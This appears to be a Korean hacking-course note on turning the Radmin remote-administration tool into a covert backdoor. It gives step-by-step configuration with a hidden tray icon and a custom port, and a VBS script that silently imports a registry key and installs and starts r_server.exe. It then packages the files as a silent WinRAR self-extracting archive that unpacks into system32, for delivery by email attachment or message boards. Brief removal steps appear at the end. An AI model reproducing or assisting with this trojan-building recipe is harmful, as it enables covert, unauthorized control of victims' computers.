네트워크 해킹 - 10. 원격제어를 이용한 공격 (Radmin)

원격제어 악성도구 [Radmin]

 - radmin22.exe 프로그램은 관리용 프로그램으로 원격제어를 이용한 시스템 관리에 이용하는 도구.

 - 실행 모듈 몇가지를 가지고 다른 컴퓨터를 원격으로 제어할 수 있음.

 - XP 환경에서만 가능!

  <악성도구화 및 실행 절차>  

1. radmin2.2 다운로드  - 검색 엔진을 통해 다운로드

2. 설치

2-1. 소프트웨어 설치

2-2. 사용할 패스워드 입력

2-3. Settings for Remote Administrator server 프로그램 실행하여 tool의 setup 설정

        - option 버튼 클릭

        - port 영역에 체크박스 해제

        - 사용할 port 번호 : 449

        - Tray Icon 영역에서 Hide tray icon 체크

2-4. 도구 설치 후 재부팅 메시지 : no (Remote 모듈만 빼서 쓸 예정. 재부팅 안해도 됨)

3. 패키징

3-1. 공격 도구로 사용할 프로그램 수집 (총6개) _위부터 4개는 필수

        - r_server.exe

        - raddrv.dll

        - radmin.reg : registry 만들기

        - radmin.vbs : script 만들기

- 공격자인 사람한테 피해자IP를 전송하는 프로그램 (구하지 못함)

- admin.dll 피해자의 방화벽 상태정보 송달하는 프로그램 (구하기 어려움)

3-2. radmin registry 만들기

        - regedit 실행

          HKEY_LOCAL_MACHINE -> system ->Radmin 마우스 우측 버튼 -> 내보내기 메뉴 선택 -> radmin.reg로 저장

3-3. radmin.vbs 작성

        set ws=wscript.createobject("wscript.shell")

        ws.run "regedit.exe /s radmin.reg",0

        ws.run "r_server.exe /install /silence",0

        ws.run "r_server.exe /start",0

        ==> radmin.vbs로 저장

3-4. 4개의 프로그램 패키징 : winrar 프로그램 사용

        프로그램들 선택 -> 압축 추가 -> 메뉴에서 SFX 선택 -> 압축 이름 설정 -> 고급탭 클릭 -> SFX 옵션 클릭

        -> 압축 풀 경로 : %SystemRoot%\system32 입력

        -> 압축 풀기 후 실행 : radmin.vbs 입력

        -> 모드 탭 -> 조용한 모드 : 모두 숨김 선택

* 패킹 : 프로그램의 구조를 변경하는 것

* 패키징 : 압축하는 것. winrar는 추가 옵션을 사용해서 압축할 수 있음 (악성공격 실행코드를 넣을 수 있음)

(WinRAR v5.11 한글판.zip) 

 

4. 배포 : 이메일 첨부, 게시판을 이용

  <radmin 공격도구 제거>  

  1.  r_server.exe 프로세스 제거

  2.  radmin registry 제거

  3.  %SystemRoot%system32에서 r_server.exe, raddrv.dll, radmin.vbs, radmin.reg 제거

  4.  시스템 재부팅